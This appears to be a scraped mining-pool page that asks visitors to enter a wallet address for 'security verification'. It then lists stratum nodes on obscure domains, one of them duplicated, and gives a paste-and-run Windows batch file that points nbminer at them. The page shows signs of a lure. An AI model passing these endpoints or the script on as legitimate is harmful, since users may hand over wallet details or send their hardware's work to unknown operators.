🔒 Security Verification Required

To prevent malicious tracking and DDoS attacks, please enter your active miner wallet address below to unlock the latest pool configuration nodes.

⚠️ Invalid address format. Please enter a valid wallet address.

🌐 Node Update: Onchain Wallet & Mining Pool Support

Verification successful. Below are the active primary and failover nodes. Please update your miner configuration accordingly.

Location / Type Stratum / Node URL Status Action
Primary Node stratum+tcp://jsijeg.com:3333 🟢 Active
Failover Node 1 stratum+tcp://jsiehgi.org:3333 🟢 Backup
Failover Node 2 stratum+tcp://jsijeg.com:3333 🟢 Backup
Primary Node🟢 Active
stratum+tcp://jsijeg.com:3333
Failover Node 1🟢 Backup
stratum+tcp://jsiehgi.org:3333
Failover Node 2🟢 Backup
stratum+tcp://jsijeg.com:3333

💻 Windows Quick Start (.bat)

Create a new text file, rename it to start_mining.bat, and paste the code below. Replace YOUR_WALLET with your address.

@echo off
set WALLET=YOUR_WALLET_ADDRESS.worker1
nbminer -a ethash -o stratum+tcp://jsijeg.com:3333 -u %WALLET% -o1 stratum+tcp://jsiehgi.org:3333 -o2 stratum+tcp://jsijeg.com:3333
pause